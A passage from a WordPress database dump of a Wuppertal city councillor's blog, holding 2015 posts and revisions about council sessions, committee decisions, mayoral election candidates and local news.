beschlossen. Nach Aussage von Dr. Slawigs werden die Betroffenen noch im Juli angeschrieben, so dass die Auszahlung dann zeitnah erfolgen kann.\r\nDie Hotel AG wird mit der GWG verschmolzen.\r\nDie Sitzung war von vielen Zwischenrufen und Nebendiskussionen geprägt. Noch nie hat der OB seine Glocke so oft gebraucht, wie heute. Scheinbar sind einige Ratskollegen urlaubsreif.\r\nDer Ansiedlung von IKEA steht mit dem Beschluss der Änderung des Flächennutzungsplans und des Bebauuungsplans nichts mehr im Weg.','Ratssitzung vom 22.06.2015','','inherit','open','open','','245-revision-v1','','','2015-06-22 18:36:05','2015-06-22 16:36:05','',245,'http://www.ollital.de/wordpress/index.php/2015/06/245-revision-v1/',0,'revision','',0),(251,2,'2015-06-22 21:18:11','2015-06-22 19:18:11','Die Erstattung der Elternbeiträge und Verpflegungskosten während des Kita Streiks wurde beschlossen. Nach Aussage von Dr. Slawigs werden die Betroffenen noch im Juli angeschrieben, so dass die Auszahlung dann zeitnah erfolgen kann.\r\nDie Hotel AG wird mit der GWG verschmolzen.\r\nDr. Slawig wird dem Rat im Haushaltsplan keine Senkung des Gewerbesteuerhebesatzes vorlegen.\r\nDie Sitzung war von vielen Zwischenrufen und Nebendiskussionen geprägt. Noch nie hat der OB seine Glocke so oft gebraucht, wie heute. Scheinbar sind einige Ratskollegen urlaubsreif.\r\n\r\nDer Baubeginn für IKEA steht mit dem Beschluss der Änderung des Flächennutzungsplans und des Bebauuungsplans nichts mehr im Weg.\r\n\r\nIn der Sommerpause wird der Ratsaal renoviert. Der Lastenaufzug wurde bereits am letzten Samstag auf der linken Seite der Eingangtreppe aufgebaut. Auch die Klimaanlage soll saniert werden. In der heutigen Sitzung hab ich bemerkt, dass das keine schlechte Idee ist.\r\n\r\n','Ratssitzung vom 22.06.2015','','inherit','open','open','','245-revision-v1','','','2015-06-22 21:18:11','2015-06-22 19:18:11','',245,'http://www.ollital.de/wordpress/index.php/2015/06/245-revision-v1/',0,'revision','',0),(252,2,'2015-06-22 21:45:49','2015-06-22 19:45:49','Die Erstattung der Elternbeiträge und Verpflegungskosten während des Kita Streiks wurde beschlossen. Nach Aussage von Dr. Slawigs werden die Betroffenen noch im Juli angeschrieben, so dass die Auszahlung dann zeitnah erfolgen kann.\r\nDie Hotel AG wird mit der GWG verschmolzen.\r\nDr. Slawig wird dem Rat im Haushaltsplan keine Senkung des Gewerbesteuerhebesatzes vorschlagen.\r\nDie Sitzung war von vielen Zwischenrufen und Nebendiskussionen geprägt. Noch nie hat der OB seine Glocke so oft gebraucht, wie heute. Scheinbar sind einige Ratskollegen urlaubsreif.\r\n\r\nDer Baubeginn für IKEA steht mit dem Beschluss der Änderung des Flächennutzungsplans und des Bebauuungsplans nichts mehr im Weg.\r\n\r\nIn der Sommerpause wird der Ratsaal renoviert. Der Lastenaufzug wurde bereits am letzten Samstag auf der linken Seite der Eingangtreppe aufgebaut. Auch die Klimaanlage soll saniert werden. In der heutigen Sitzung hab ich bemerkt, dass das keine schlechte Idee ist.\r\n\r\n','Ratssitzung vom 22.06.2015','','inherit','open','open','','245-revision-v1','','','2015-06-22 21:45:49','2015-06-22 19:45:49','',245,'http://www.ollital.de/wordpress/index.php/2015/06/245-revision-v1/',0,'revision','',0),(253,2,'2015-06-22 21:53:04','2015-06-22 19:53:04','Die Erstattung der Elternbeiträge und Verpflegungskosten während des Kita Streiks wurde beschlossen. Nach Aussage von Dr. Slawigs werden die Betroffenen noch im Juli angeschrieben, so dass die Auszahlung dann zeitnah erfolgen kann.\r\nDie Hotel AG wird mit der GWG verschmolzen.\r\nDr. Slawig wird dem Rat im Haushaltsplan keine Senkung des Gewerbesteuerhebesatzes vorschlagen.\r\nDie Sitzung war von vielen Zwischenrufen und Nebendiskussionen geprägt. Noch nie hat der OB seine Glocke so oft gebraucht, wie heute. Scheinbar sind einige Ratskollegen urlaubsreif.\r\n\r\nDem Baubeginn für IKEA steht mit dem Beschluss der Änderung des Flächennutzungsplans und des Bebauuungsplans nichts mehr im Weg.\r\n\r\nIn der Sommerpause wird der Ratsaal renoviert. Der Lastenaufzug wurde bereits am letzten Samstag auf der linken Seite der Eingangtreppe aufgebaut. Auch die Klimaanlage soll saniert werden. In der heutigen Sitzung hab ich bemerkt, dass das keine schlechte Idee ist.\r\n\r\n','Ratssitzung vom 22.06.2015','','inherit','open','open','','245-revision-v1','','','2015-06-22 21:53:04','2015-06-22 19:53:04','',245,'http://www.ollital.de/wordpress/index.php/2015/06/245-revision-v1/',0,'revision','',0),(254,2,'2015-06-25 22:17:35','2015-06-25 20:17:35','Das talwärts Magazin feierte heute abend im Kontakthof seinen ersten Geburtstag mit Livemusik und vielen Besuchern. Natürlich waren die Macher auch fast alle persönlich anwesend.\r\nMeinen Glückwunsch, ihr seit eine echte Bereicherung der Wuppertaler Presselandschaft.\r\n','talwärts feiert Geburtstag','','publish','open','open','','talwarts-feiert-geburtstag','','','2015-06-25 22:17:35','2015-06-25 20:17:35','',0,'http://www.ollital.de/wordpress/?p=254',0,'post','',0),(255,2,'2015-06-25 22:17:35','2015-06-25 20:17:35','Das talwärts Magazin feierte heute abend im Kontakthof seinen ersten Geburtstag mit Livemusik und vielen Besuchern. Natürlich waren die Macher auch fast alle persönlich anwesend.\r\nMeinen Glückwunsch, ihr seit eine echte Bereicherung der Wuppertaler Presselandschaft.\r\n','talwärts feiert Geburtstag','','inherit','open','open','','254-revision-v1','','','2015-06-25 22:17:35','2015-06-25 20:17:35','',254,'http://www.ollital.de/wordpress/index.php/2015/06/254-revision-v1/',0,'revision','',0),(256,2,'2015-06-29 21:34:17','2015-06-29 19:34:17','Zu meiner Überraschung erhielt ich heute per Mail die Einladung zu einer Sondersitzung des Ausschuss für Stadtentwicklung, Wirtschaft und Bauen am 23.07.\r\nLeider ist noch keine Tagesordnung verfügbar, so dass ich nicht weiß, welches Thema so wichtig sein kann, in der Ferienzeit eine Sitzung anzuberaumen.\r\nIch werde zu gegebener Zeit hier informieren, sofern die Sitzung öffentlich ist.\r\n','Sondersitzung des Stadtentwicklungsauschss','','publish','open','open','','sondersitzung-des-stadtentwicklungsauschss','','','2015-06-29 21:34:17','2015-06-29 19:34:17','',0,'http://www.ollital.de/wordpress/?p=256',0,'post','',0),(257,2,'2015-06-29 21:34:17','2015-06-29 19:34:17','Zu meiner Überraschung erhielt ich heute per Mail die Einladung zu einer Sondersitzung des Ausschuss für Stadtentwicklung, Wirtschaft und Bauen am 23.07.\r\nLeider ist noch keine Tagesordnung verfügbar, so dass ich nicht weiß, welches Thema so wichtig sein kann, in der Ferienzeit eine Sitzung anzuberaumen.\r\nIch werde zu gegebener Zeit hier informieren, sofern die Sitzung öffentlich ist.\r\n','Sondersitzung des Stadtentwicklungsauschss','','inherit','open','open','','256-revision-v1','','','2015-06-29 21:34:17','2015-06-29 19:34:17','',256,'http://www.ollital.de/wordpress/index.php/2015/06/256-revision-v1/',0,'revision','',0),(259,2,'2015-07-02 11:30:23','2015-07-02 09:30:23','Olli Graf, Wuppertaler gebürtig und aus Überzeugung.\r\nJahrgang 1969\r\nDipl. Inform. (FH)\r\nPirat\r\nStadtverordneter im Rat der Stadt Wuppertal #talrat\r\nAuschuss für Stadtentwicklung, Wirtschaft und Bauen\r\nBetriebsauschuss Gebäudemanagement Wuppertal\r\nMitglied in der Fraktion BÜNDNIS 90 / Die Grünen im Stadtrat\r\n','Über mich','','inherit','open','open','','74-revision-v1','','','2015-07-02 11:30:23','2015-07-02 09:30:23','',74,'http://www.ollital.de/wordpress/index.php/2015/07/74-revision-v1/',0,'revision','',0),(260,2,'2015-07-03 08:35:45','2015-07-03 06:35:45','\"fsa15\"\r\nHeute fand in Düsseldorf ein Teil der \"Freiheit statt Angst\" Tour 2015 statt. Die dezentrale Demo gegen Vorratsdatenspeicherung und Überwachung zog etwa 50 Leute in die verregnete Landeshauptstadt. Über die Route\r\n
                                                                  \r\n
                                                                • Friedrich-Ebert-Straße
                                                                • \r\n
                                                                • Steinstraße
                                                                • \r\n
                                                                • Königsallee
                                                                • \r\n
                                                                • Trinkhausstraße
                                                                • \r\n
                                                                • Heinrich-Heine-Allee
                                                                • \r\n
                                                                • Grabbeplatz
                                                                • \r\n
                                                                • Mühlenstraße
                                                                • \r\n
                                                                • Burgplatz
                                                                • \r\n
                                                                • Rathausufer
                                                                • \r\n
                                                                • Schulstraße
                                                                • \r\n
                                                                • Benrather Straße
                                                                • \r\n
                                                                \r\n\r\nkamen wir dann zur Schlusskundgebung auf dem Graf-Adolf-Platz an. Dort war dann auch die Sonne wieder rausgekommen.\r\nIch durfte bei den vorderen Polizeimotorrädern vorweg gehen und gabdadurch das Tempo vor.\r\nSchade, das wir nicht mehr Leute motivieren konnten, aber unsere Landtagsabgeordneten Joachim Paul und Frank Herrmann waren mit von der Partie.\r\nDanke an Patrick Schiffer für die Organisation.\r\nUnd mein Dank an die Düsseldorfer Polizei, die sich meinem Gehtempo angepasst haben, so dass ich die ganze Strecke zu Fuss geschafft habe.\r\n','Freiheit statt Angst','','inherit','open','open','','229-revision-v1','','','2015-07-03 08:35:45','2015-07-03 06:35:45','',229,'http://www.ollital.de/wordpress/index.php/2015/07/229-revision-v1/',0,'revision','',0),(261,2,'2015-07-07 21:42:23','2015-07-07 19:42:23','Inzwischen wurde die Tagesordnung für die Sondersitzung des Ausschuss für Stadtentwicklung, Witschaft und Bauen am 23.07. veröffentlicht.\r\n\r\nEs stehen zwei Punkte auf der TO\r\n\r\n1) Bebauungsplan Monschauer Str., hier sollen drei Wohnhäuser gebaut werden.\r\n2) Bebauungsplan Ottenbrucher Str. /Luisenstr, hier geht es um den Bau eines Wohnhauses auf dem Gelände der Herder Schule.\r\n\r\nDie Dringlichkeit dieser Angelegenheiten wurde bisher nicht begründet.\r\n\r\n','Themen der Sondersitzung StaWiBau','','publish','open','open','','themen-der-sondersitzung-stawibau','','','2015-07-07 21:43:36','2015-07-07 19:43:36','',0,'http://www.ollital.de/wordpress/?p=261',0,'post','',0),(262,2,'2015-07-07 21:42:23','2015-07-07 19:42:23','Inzwischen wurde die Tagesordnung für die Sondersitzung des Ausschuss für Stadtentwicklung, Witschaft und Bauen am 23.07. veröffentlicht.\r\n\r\nEs stehen zwei Punkte auf der TO\r\n\r\n1) Bebauungsplan Monschauer Str., hier sollen drei Wohnhäuser gebaut werden.\r\n2) Bebauungsplan Ottenbrucher Str. /Luisenstr, hier geht es um den Bau eines Wohnhauses auf dem Gelände der Herder Schule.\r\n\r\nDie Dringlichkeit dieser Angelegenheit wurde bisher nicht begründet.\r\n\r\n','Themen der Sondersitzung StaWiBau','','inherit','open','open','','261-revision-v1','','','2015-07-07 21:42:23','2015-07-07 19:42:23','',261,'http://www.ollital.de/wordpress/index.php/2015/07/261-revision-v1/',0,'revision','',0),(263,2,'2015-07-07 21:43:36','2015-07-07 19:43:36','Inzwischen wurde die Tagesordnung für die Sondersitzung des Ausschuss für Stadtentwicklung, Witschaft und Bauen am 23.07. veröffentlicht.\r\n\r\nEs stehen zwei Punkte auf der TO\r\n\r\n1) Bebauungsplan Monschauer Str., hier sollen drei Wohnhäuser gebaut werden.\r\n2) Bebauungsplan Ottenbrucher Str. /Luisenstr, hier geht es um den Bau eines Wohnhauses auf dem Gelände der Herder Schule.\r\n\r\nDie Dringlichkeit dieser Angelegenheiten wurde bisher nicht begründet.\r\n\r\n','Themen der Sondersitzung StaWiBau','','inherit','open','open','','261-revision-v1','','','2015-07-07 21:43:36','2015-07-07 19:43:36','',261,'http://www.ollital.de/wordpress/index.php/2015/07/261-revision-v1/',0,'revision','',0),(265,2,'2015-07-12 17:12:18','2015-07-12 15:12:18','Die Wuppertal Bewegung berichtet, dass bereits am 21. Juni in den frühen Morgenstunden das sog. Fliedner-Kreuz aus der Wichernkapelle an der Nordbahntrasse entwendet wurde.\r\nDie schützende Plexiglas Abdeckung wurde gewaltsam aus ihrer Befestigung gerissen. Da in den letzten beiden Wochen keine Hinweise auf den Verbleib des Kreuzes gefunden wurden,\r\nsetzt die Wuppertal Bewegung eine Belohnung von 500,- EUR für sachdienliche Hinweise, die zum Auffinden des Kreuzes führen, aus.\r\n\r\nOriginalmitteilung der Wuppertal Bewegung','Diebstahl an der Nordbahntrasse','','publish','open','open','','diebstahl-an-der-nordbahntrasse','','','2015-07-12 17:12:18','2015-07-12 15:12:18','',0,'http://www.ollital.de/wordpress/?p=265',0,'post','',0),(266,2,'2015-07-12 17:12:01','2015-07-12 15:12:01','Die Wuppertal Bewegung berichtet, dass bereits am 21. Juni in den frühen Morgenstunden das sog. Fliedner-Kreuz aus der Wichernkapelle an der Nordbahntrasse entwendet wurde.\r\nDie schützende Plexiglas Abdeckung wurde gewaltsam aus ihrer Befestigung gerissen. Da in den letzten beiden Wochen keine Hinweise auf den Verbleib des Kreuzes gefunden wurden,\r\nsetzt die Wuppertal Bewegung eine Belohnung von 500,- EUR für sachdienliche Hinweise, die zum Auffinden des Kreuzes führen, aus.\r\n\r\nOriginalmitteilung der Wuppertal Bewegung','Diebstahl an der Nordbahntrasse','','inherit','open','open','','265-revision-v1','','','2015-07-12 17:12:01','2015-07-12 15:12:01','',265,'http://www.ollital.de/wordpress/index.php/2015/07/265-revision-v1/',0,'revision','',0),(267,2,'2015-07-15 13:45:22','2015-07-15 11:45:22','Olli Graf, Wuppertaler gebürtig und aus Überzeugung.\r\nJahrgang 1969\r\nDipl. Inform. (FH)\r\nPirat\r\nStadtverordneter im Rat der Stadt Wuppertal #talrat\r\nAuschuss für Stadtentwicklung, Wirtschaft und Bauen\r\nBetriebsauschuss Gebäudemanagement Wuppertal\r\nMitglied in der Fraktion BÜNDNIS 90 / Die Grünen im Stadtrat\r\n\r\nStadtverordneter Olli Graf\r\nJohannes-Rau-Platz 1\r\n42275 Wuppertal\r\n','Über mich','','inherit','open','open','','74-revision-v1','','','2015-07-15 13:45:22','2015-07-15 11:45:22','',74,'http://www.ollital.de/wordpress/index.php/2015/07/74-revision-v1/',0,'revision','',0),(269,2,'2015-07-23 17:15:26','2015-07-23 15:15:26','Auf der Tagesordnung der heutigen Sondersitzung standen zwei Bebauungspläne\r\n\r\nZum einen sollen in der Monschaustr. 10 drei Mehrfamilienhäuser in dreigeschossiger Bauweise mit insgesamt 21 Wohnungen entstehen.\r\nDer Aufstellungsbeschluss wurde einstimmig gefasst.\r\n\r\nZum anderen ging es um die Bauvoranfrage der Herder Schule, die auf ihrem Grundstück zwischen Luisenstr. und Ottenbrucher Str. ein viergeschossiges Wohnhaus errichten möchte. Da dies nicht in das Stadt- und Siedlungsbild der Umgebung passt, musste dieser gegenläufige Beschluss der Verwaltung gefasst werden, sonst wäre automatisch Baurecht entstanden. Daraus begründet sich auch die Sondersitzung.\r\nAuch dieser Aufstellungbeschluss wurde einstimmig gefasst.\r\n','Stadtentwicklungsausschuss vom 23.07.2015','','publish','open','open','','stadtentwicklungsausschuss-vom-23-07-2015','','','2015-07-23 19:36:04','2015-07-23 17:36:04','',0,'http://www.ollital.de/wordpress/?p=269',0,'post','',0),(270,2,'2015-07-23 17:15:26','2015-07-23 15:15:26','Auf der Tagesordnung der heutigen Sondersitzung standen zwei Bebauungspläne\r\n\r\nZum einen sollen in der Monschaustr. 10 drei Mehrfamilienhäuser in dreigeschossiger Bauweise mit insgesamt 21 Wohnungen entstehen.\r\nDer Aufstellungsbeschluss wurde einstimmig gefasst.\r\n\r\nZum anderen ging es um die Bauvoranfrage der Herder Schule, die auf ihrem Grundstück zwischen Luisenstr. und Ottenbrucher Str. ein viergeschossiges Wohnhaus errichten möchte. Da dies nicht in das Stadt- und Siedlungsbild der Umgebung passt, musste dieser Beschluss gefasst werden, sonst wäre automatisch Baurecht entstanden. Daraus begründet sich auch die Sondersitzung.\r\nAuch dieser Aufstellungbeschluss wurde einstimmig gefasst.\r\n','Stadtentwicklungsausschuss vom 23.07.2015','','inherit','open','open','','269-revision-v1','','','2015-07-23 17:15:26','2015-07-23 15:15:26','',269,'http://www.ollital.de/wordpress/index.php/2015/07/269-revision-v1/',0,'revision','',0),(271,2,'2015-07-23 19:36:04','2015-07-23 17:36:04','Auf der Tagesordnung der heutigen Sondersitzung standen zwei Bebauungspläne\r\n\r\nZum einen sollen in der Monschaustr. 10 drei Mehrfamilienhäuser in dreigeschossiger Bauweise mit insgesamt 21 Wohnungen entstehen.\r\nDer Aufstellungsbeschluss wurde einstimmig gefasst.\r\n\r\nZum anderen ging es um die Bauvoranfrage der Herder Schule, die auf ihrem Grundstück zwischen Luisenstr. und Ottenbrucher Str. ein viergeschossiges Wohnhaus errichten möchte. Da dies nicht in das Stadt- und Siedlungsbild der Umgebung passt, musste dieser gegenläufige Beschluss der Verwaltung gefasst werden, sonst wäre automatisch Baurecht entstanden. Daraus begründet sich auch die Sondersitzung.\r\nAuch dieser Aufstellungbeschluss wurde einstimmig gefasst.\r\n','Stadtentwicklungsausschuss vom 23.07.2015','','inherit','open','open','','269-revision-v1','','','2015-07-23 19:36:04','2015-07-23 17:36:04','',269,'http://www.ollital.de/wordpress/index.php/2015/07/269-revision-v1/',0,'revision','',0),(272,2,'2015-07-24 08:24:44','2015-07-24 06:24:44','Strassen NRW berichtet, dass ab Montag den 27.07.2015 ab ca. 04:00 Uhr der Kiesbergtunnel nach 5-monatiger Sanierung wieder geöffnet wird. Es werden noch einige Restarbeiten im laufenden Betrieb durchgeführt, daher gibt es eine Geschwindigkeitsbegrenzung von 50 km/h vor und im Tunnel.\r\n','Kiesbergtunnel vor der Öffnung','','publish','open','open','','kiesbergtunnel-vor-der-ofnnung','','','2015-07-24 13:05:24','2015-07-24 11:05:24','',0,'http://www.ollital.de/wordpress/?p=272',0,'post','',0),(273,2,'2015-07-24 08:24:44','2015-07-24 06:24:44','Strassen NRW berichtet, dass ab Montag den 27.07.2015 ab ca. 04:00 Uhr der Kiesbergtunnel nach 5-monatiger Sanierung wieder geöffnet wird. Es werden noch einige Restarbeiten im laufenden Betrieb durchgeführt, daher gibt es eine Geschwindigkeitsbegrenzung von 50 km/h vor und im Tunnel.\r\n','Kiesbergtunnel vor der Öfnnung','','inherit','open','open','','272-revision-v1','','','2015-07-24 08:24:44','2015-07-24 06:24:44','',272,'http://www.ollital.de/wordpress/index.php/2015/07/272-revision-v1/',0,'revision','',0),(274,2,'2015-07-24 13:05:24','2015-07-24 11:05:24','Strassen NRW berichtet, dass ab Montag den 27.07.2015 ab ca. 04:00 Uhr der Kiesbergtunnel nach 5-monatiger Sanierung wieder geöffnet wird. Es werden noch einige Restarbeiten im laufenden Betrieb durchgeführt, daher gibt es eine Geschwindigkeitsbegrenzung von 50 km/h vor und im Tunnel.\r\n','Kiesbergtunnel vor der Öffnung','','inherit','open','open','','272-revision-v1','','','2015-07-24 13:05:24','2015-07-24 11:05:24','',272,'http://www.ollital.de/wordpress/index.php/2015/07/272-revision-v1/',0,'revision','',0),(276,2,'2015-07-28 17:01:53','2015-07-28 15:01:53','Heute nachmittag tagte der Wahlausschuss, damit stehen jetzt folgende Kandidaten für den 13.09. fest:\r\n\r\nPeter Jung (CDU)\r\nAndreas Mucke (SPD)\r\nMarc Schulz (Bündnis 90/Die Grünen)\r\nGunhild Böth (Die Linke)\r\nBeate Petersen (WfW)\r\nMarkus Stranzenberg (Pro NRW/ Rep)\r\nBjörn \'Hose\' Werner (Die Partei)\r\n\r\nAlle Kandidaten wurden en bloc einstimmig zugelassen.\r\nDie Wahlbenachrichtigungen können jetzt gedruckt werden und sollen etwa bis Mitte August bei den ca. 270.000 Wuppertaler Wählern eintreffen.\r\n','Die Kandidaten für die Oberbürgermeisterwahl stehen fest','','publish','open','open','','die-kandidaten-fur-die-oberburgermeisterwahl-stehen-fest','','','2015-07-28 21:31:11','2015-07-28 19:31:11','',0,'http://www.ollital.de/wordpress/?p=276',0,'post','',0),(277,2,'2015-07-28 15:48:09','2015-07-28 13:48:09','Heute nachmittag tagte der Wahlausschuss, damit stehen jetzt folgende Kandidaten für den 13.09. fest:\r\n\r\nPeter Jung (CDU)\r\nAndreas Mücke (SPD)\r\nMarc Schulz (Bündnis 90/Die Grünen)\r\nGunhild Böth (Die Linke)\r\nBeate Petersen (parteilos)\r\n\r\n','Kandidaten der OB-Wahl','','inherit','open','open','','276-revision-v1','','','2015-07-28 15:48:09','2015-07-28 13:48:09','',276,'http://www.ollital.de/wordpress/index.php/2015/07/276-revision-v1/',0,'revision','',0),(278,2,'2015-07-28 16:05:53','2015-07-28 14:05:53','Heute nachmittag tagte der Wahlausschuss, damit stehen jetzt folgende Kandidaten für den 13.09. fest:\r\n\r\nPeter Jung (CDU)\r\nAndreas Mücke (SPD)\r\nMarc Schulz (Bündnis 90/Die Grünen)\r\nGunhild Böth (Die Linke)\r\nBeate Petersen (parteilos)\r\nMarkus Stranzenberg (Pro NRW/ Rep)\r\n\r\n\r\n','Kandidaten der OB-Wahl','','inherit','open','open','','276-revision-v1','','','2015-07-28 16:05:53','2015-07-28 14:05:53','',276,'http://www.ollital.de/wordpress/index.php/2015/07/276-revision-v1/',0,'revision','',0),(279,2,'2015-07-28 16:08:11','2015-07-28 14:08:11','Heute nachmittag tagte der Wahlausschuss, damit stehen jetzt folgende Kandidaten für den 13.09. fest:\r\n\r\nPeter Jung (CDU)\r\nAndreas Mücke (SPD)\r\nMarc Schulz (Bündnis 90/Die Grünen)\r\nGunhild Böth (Die Linke)\r\nBeate Petersen (parteilos)\r\nMarkus Stranzenberg (Pro NRW/ Rep)\r\nBjörn \'Hose\' Werner (Die Partei)\r\n','Kandidaten der OB-Wahl','','inherit','open','open','','276-revision-v1','','','2015-07-28 16:08:11','2015-07-28 14:08:11','',276,'http://www.ollital.de/wordpress/index.php/2015/07/276-revision-v1/',0,'revision','',0),(280,2,'2015-07-28 17:01:53','2015-07-28 15:01:53','Heute nachmittag tagte der Wahlausschuss, damit stehen jetzt folgende Kandidaten für den 13.09. fest:\r\n\r\nPeter Jung (CDU)\r\nAndreas Mücke (SPD)\r\nMarc Schulz (Bündnis 90/Die Grünen)\r\nGunhild Böth (Die Linke)\r\nBeate Petersen (parteilos)\r\nMarkus Stranzenberg (Pro NRW/ Rep)\r\nBjörn \'Hose\' Werner (Die Partei)\r\n\r\nAlle Kandidaten wurden en bloc einstimmig zugelassen.\r\nDie Wahlbenachrichtigungen können jetzt gedruckt werden und sollen etwa bis Mitte August bei den ca. 270.000 Wuppertaler Wählern eintreffen.\r\n','Die Kandidaten für die Oberbürgermeisterwahl stehen fest','','inherit','open','open','','276-revision-v1','','','2015-07-28 17:01:53','2015-07-28 15:01:53','',276,'http://www.ollital.de/wordpress/index.php/2015/07/276-revision-v1/',0,'revision','',0),(281,2,'2015-07-28 17:03:01','2015-07-28 15:03:01','Heute nachmittag tagte der Wahlausschuss, damit stehen jetzt folgende Kandidaten für den 13.09. fest:\r\n\r\nPeter Jung (CDU)\r\nAndreas Mucke (SPD)\r\nMarc Schulz (Bündnis 90/Die Grünen)\r\nGunhild Böth (Die Linke)\r\nBeate Petersen (parteilos)\r\nMarkus Stranzenberg (Pro NRW/ Rep)\r\nBjörn \'Hose\' Werner (Die Partei)\r\n\r\nAlle Kandidaten wurden en bloc einstimmig zugelassen.\r\nDie Wahlbenachrichtigungen können jetzt gedruckt werden und sollen etwa bis Mitte August bei den ca. 270.000 Wuppertaler Wählern eintreffen.\r\n','Die Kandidaten für die Oberbürgermeisterwahl stehen fest','','inherit','open','open','','276-revision-v1','','','2015-07-28 17:03:01','2015-07-28 15:03:01','',276,'http://www.ollital.de/wordpress/index.php/2015/07/276-revision-v1/',0,'revision','',0),(282,2,'2015-07-28 21:31:11','2015-07-28 19:31:11','Heute nachmittag tagte der Wahlausschuss, damit stehen jetzt folgende Kandidaten für den 13.09. fest:\r\n\r\nPeter Jung (CDU)\r\nAndreas Mucke (SPD)\r\nMarc Schulz (Bündnis 90/Die Grünen)\r\nGunhild Böth (Die Linke)\r\nBeate Petersen (WfW)\r\nMarkus Stranzenberg (Pro NRW/ Rep)\r\nBjörn \'Hose\' Werner (Die Partei)\r\n\r\nAlle Kandidaten wurden en bloc einstimmig zugelassen.\r\nDie Wahlbenachrichtigungen können jetzt gedruckt werden und sollen etwa bis Mitte August bei den ca. 270.000 Wuppertaler Wählern eintreffen.\r\n','Die Kandidaten für die Oberbürgermeisterwahl stehen fest','','inherit','open','open','','276-revision-v1','','','2015-07-28 21:31:11','2015-07-28 19:31:11','',276,'http://www.ollital.de/wordpress/index.php/2015/07/276-revision-v1/',0,'revision','',0),(283,2,'2015-08-05 21:21:06','2015-08-05 19:21:06','Die Fraktionsvorsitzenden wurden heute informiert, dass die Sondersitzung des Rats am 17.08., in der eigentlich der Haushalt eingebracht werden sollte, ausfällt.\r\nBegründet wird dies damit, dass die Kosten für die Flüchtlingsunterbringung nicht darstellbar sind. Der Kämmerer Dr. Slawig möchte den Flüchtlingsgipfel der Bundesregierung abwarten, da dort ggf. die Finanzmittel für die Kommunen erhöht werden könnten.','Sonderratssitzung fällt aus','','publish','open','open','','sonderratssitzung-fallt-aus','','','2015-08-05 21:21:06','2015-08-05 19:21:06','',0,'http://www.ollital.de/wordpress/?p=283',0,'post','',0),(284,2,'2015-08-05 21:21:06','2015-08-05 19:21:06','Die Fraktionsvorsitzenden wurden heute informiert, dass die Sondersitzung des Rats am 17.08., in der eigentlich der Haushalt eingebracht werden sollte, ausfällt.\r\nBegründet wird dies damit, dass die Kosten für die Flüchtlingsunterbringung nicht darstellbar sind. Der Kämmerer Dr. Slawig möchte den Flüchtlingsgipfel der Bundesregierung abwarten, da dort ggf. die Finanzmittel für die Kommunen erhöht werden könnten.','Sonderratssitzung fällt aus','','inherit','open','open','','283-revision-v1','','','2015-08-05 21:21:06','2015-08-05 19:21:06','',283,'http://www.ollital.de/wordpress/index.php/2015/08/283-revision-v1/',0,'revision','',0),(287,2,'2015-08-19 22:38:16','2015-08-19 20:38:16','Der Freifunk Rheinland e.V. wird in Zusammenarbeit mit dem Gebäudemanagement freie WLAN Router in 800 kommunalen Gebäuden aufstellen. Das wurde heute in einer gemeinsamen Pressekonferenz bekanntgegeben. Damit wird jetzt das ermöglicht, was unsere Fraktion bereits im April beantragt hatten. Leider wurde der Antrag unnötig durch die GroKo verzögert. Die rechtlichen Bedenken, die noch vor den Sommerferien bestanden sind jetzt auf einmal kommentarlos weggefallen.Eigentlich hätte unser Antrag nächste Woche im Stadtentwicklungsausschuss behandelt werden sollen. Auch dies war mal eine Forderung der GroKo.\r\nAber in der Sache ist das eine gute Nachricht und das sind weit mehr Standorte, als ich hoffen gewagt habe.\r\n','800 Freifunkrouter für Wuppertal','','publish','open','open','','800-freifunkrouter-fur-wuppertal','','','2015-08-19 22:38:16','2015-08-19 20:38:16','',0,'http://www.ollital.de/wordpress/?p=287',0,'post','',0),(288,2,'2015-08-19 22:38:16','2015-08-19 20:38:16','Der Freifunk Rheinland e.V. wird in Zusammenarbeit mit dem Gebäudemanagement freie WLAN Router in 800 kommunalen Gebäuden aufstellen. Das wurde heute in einer gemeinsamen Pressekonferenz bekanntgegeben. Damit wird jetzt das ermöglicht, was unsere Fraktion bereits im April beantragt hatten. Leider wurde der Antrag unnötig durch die GroKo verzögert. Die rechtlichen Bedenken, die noch vor den Sommerferien bestanden sind jetzt auf einmal kommentarlos weggefallen.Eigentlich hätte unser Antrag nächste Woche im Stadtentwicklungsausschuss behandelt werden sollen. Auch dies war mal eine Forderung der GroKo.\r\nAber in der Sache ist das eine gute Nachricht und das sind weit mehr Standorte, als ich hoffen gewagt habe.\r\n','800 Freifunkrouter für Wuppertal','','inherit','open','open','','287-revision-v1','','','2015-08-19 22:38:16','2015-08-19 20:38:16','',287,'http://www.ollital.de/wordpress/index.php/2015/08/287-revision-v1/',0,'revision','',0),(289,2,'2015-08-20 17:38:41','2015-08-20 15:38:41','Der erste Betriebsauschuss, an dem ich heute teilnahm tagte im Presseraum im Stadion am Zoo.Die Tagesordnung war relativ unspektakulär und es gab in allen Punkten Einstimmigkeit.\r\n\r\nDas Gebäudemanagement ist jetzt beauftragt, die Benennung der Nordtribüne des Stadions in \"Horst-Szymaniak-Tribüne\" durchzuführen.\r\nDer Standort des Noteinsatzfahrzeugs 2 wird von der Heusnerstr. 40 (ehem. Klinikum Barmen) zur Feuerwache Waldeckstr. 14 verlegt.\r\nIn Ronsdorf wird das Gebäude auf dem leerstehenden Klinkgelände Staubenthaler Str. 39 zur Kindertagestagesstätte umgebaut.\r\nDie Sanierung des Wilhelm-Dörpfeld-Gymnasium wurde formal beschlossen. Der Umzug zur Hardt wurde bereits durchgeführt und wird (lt. mündl. Bericht) gut von allen Betroffenen angenommen.\r\n','Gebäudemanagement vom 20.08.2015','','publish','open','open','','gebaudemanagement-vom-20-08-2015','','','2015-08-20 22:34:09','2015-08-20 20:34:09','',0,'http://www.ollital.de/wordpress/?p=289',0,'post','',0),(290,2,'2015-08-20 17:38:41','2015-08-20 15:38:41','Der erste Betriebsauschuss, an dem ich heute teilnahm tagte im Preseraum im Stadion am Zoo.Die Tagesordnung war relativ unspektakulär und es gab in allen Punkten Einstimmigkeit.\r\n\r\nDas Gebäudemanagement ist jetzt beauftragt, die Benennung der Nordtribüne des Stadions in \"Horst-Szymaniak-Tribüne\" durchzuführen.\r\nDer Standort des Noteinsatzfahrzeugs 2 wird von der Heusnerstr. 40 (ehem. Kliikum Barmen) zur Feuerwache Waldeckstr. 14 verlegt.\r\nIn Ronsdorf wird das Gebäude auf dem leerstehenden Klinkgelände Staubenthaler Str. 39 zur Kindertagestagesstätte umgebaut.\r\nDie Sanierung des Wilhelm-Dörpfeld-Gymnasium wurde formal beschlossen. Der Umzug zur Hardt wurde bereits durchgeführt und wird (lt. mündl. Bericht) gut von allen Betroffenen 